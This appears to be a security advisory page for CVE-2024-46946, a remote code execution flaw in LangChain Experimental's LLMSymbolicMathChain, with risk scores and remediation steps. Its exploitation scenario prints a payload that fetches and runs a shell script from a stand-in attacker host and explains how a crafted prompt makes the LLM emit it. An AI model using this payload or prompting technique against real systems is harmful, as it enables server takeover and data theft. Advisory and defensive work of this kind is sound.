CVE-2024-46946: LangChain-Experimental: RCE via eval in math chain

CRITICAL PoC AVAILABLE CISA: ATTEND
Published September 19, 2024
CISO Take

Any application using LangChain Experimental's LLMSymbolicMathChain is exposed to unauthenticated remote code execution — CVSS 9.8. A public exploit exists. Patch immediately to a version above 0.3.0 or disable this chain; there is no safe workaround if the chain is exposed to untrusted input.

Risk Assessment

Severity is maximum: network-accessible, no authentication, no user interaction, public PoC available on GitHub. The vulnerability is trivial to exploit — sympy.sympify() internally calls eval() on user-influenced strings, meaning any attacker who can reach the endpoint can run arbitrary OS commands with the process's privileges. Exposure is broad because LangChain Experimental is widely adopted in AI agent prototypes and internal tools, many of which lack perimeter controls.

Affected Systems

Package Ecosystem Vulnerable Range Patched
langchain-experimental pip No patch
135.7K OpenSSF 6.5 2.6K dependents Pushed 7d ago 17% patched ~256d to patch Full package profile →

Do you use langchain-experimental? You're affected.

Severity & Risk

CVSS 3.1
9.8 / 10
EPSS
0.7%
chance of exploitation in 30 days
Higher than 71% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C High
I High
A High

Recommended Action

6 steps
  1. PATCH

    Upgrade langchain-experimental to a version above 0.3.0 immediately.

  2. AUDIT

    Inventory all applications importing LLMSymbolicMathChain — grep codebase for 'LLMSymbolicMathChain' and 'langchain_experimental'.

  3. DISABLE

    If upgrade is not immediately possible, remove or disable LLMSymbolicMathChain from all agent configurations.

  4. ISOLATE

    Run LangChain services in sandboxed environments (containers with minimal OS capabilities, no outbound internet, drop capabilities).

  5. DETECT

    Alert on unexpected subprocess spawns, outbound connections, or file system writes from LangChain process PIDs.

  6. VERIFY

    Confirm remediation by checking installed package version: pip show langchain-experimental.

CISA SSVC Assessment

Decision Attend
Exploitation poc
Automatable Yes
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 9 - Risk Management System
ISO 42001
9.1 - Monitoring, Measurement, Analysis and Evaluation
NIST AI RMF
MS-2.5 - Testing, Evaluation, Validation and Verification
OWASP LLM Top 10
LLM02 - Insecure Output Handling

Frequently Asked Questions

What is CVE-2024-46946?

Any application using LangChain Experimental's LLMSymbolicMathChain is exposed to unauthenticated remote code execution — CVSS 9.8. A public exploit exists. Patch immediately to a version above 0.3.0 or disable this chain; there is no safe workaround if the chain is exposed to untrusted input.

Is CVE-2024-46946 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-46946, increasing the risk of exploitation.

How to fix CVE-2024-46946?

1. PATCH: Upgrade langchain-experimental to a version above 0.3.0 immediately. 2. AUDIT: Inventory all applications importing LLMSymbolicMathChain — grep codebase for 'LLMSymbolicMathChain' and 'langchain_experimental'. 3. DISABLE: If upgrade is not immediately possible, remove or disable LLMSymbolicMathChain from all agent configurations. 4. ISOLATE: Run LangChain services in sandboxed environments (containers with minimal OS capabilities, no outbound internet, drop capabilities). 5. DETECT: Alert on unexpected subprocess spawns, outbound connections, or file system writes from LangChain process PIDs. 6. VERIFY: Confirm remediation by checking installed package version: pip show langchain-experimental.

What systems are affected by CVE-2024-46946?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LangChain pipelines, math reasoning chains, LLM-powered API backends, internal AI tooling.

What is the CVSS score for CVE-2024-46946?

CVE-2024-46946 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.66%.

Technical Details

NVD Description

langchain_experimental (aka LangChain Experimental) 0.1.17 through 0.3.0 for LangChain allows attackers to execute arbitrary code through sympy.sympify (which uses eval) in LLMSymbolicMathChain. LLMSymbolicMathChain was introduced in fcccde406dd9e9b05fc9babcbeb9ff527b0ec0c6 (2023-10-05).

Exploitation Scenario

An attacker targets a public-facing AI chatbot or internal math-reasoning API built with LangChain. They craft a prompt that causes the LLM to output a valid-looking but malicious sympy expression such as '__import__("os").system("curl attacker.com/shell.sh|sh")'. LLMSymbolicMathChain passes this string to sympy.sympify(), which internally calls eval(), executing the payload with the server process's privileges. No credentials or special knowledge required — the public PoC confirms this is script-kiddie territory. A successful exploit yields full server compromise, data exfiltration, or lateral movement into the AI infrastructure.

Weaknesses (CWE)

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
September 19, 2024
Last Modified
July 16, 2025
First Seen
September 19, 2024

Related Vulnerabilities